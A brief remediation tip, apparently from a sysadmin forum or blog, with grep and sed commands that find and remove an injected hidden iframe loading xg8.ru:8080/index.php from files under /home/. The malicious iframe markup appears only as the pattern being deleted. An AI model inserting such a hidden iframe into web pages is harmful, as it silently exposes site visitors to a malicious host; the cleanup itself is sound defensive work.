Find and replace the malicious code using the sed command.
grep -rl "ru:8080/index.php" /home/ | xargs sed -i 's/<iframe src="http:\/\/xg8.ru:8080\/index.php" width=141 height=135 style="visibility: hidden"><\/iframe>//g'
Check if you have missed out any?
grep -r "ru:8080/index.php" /home/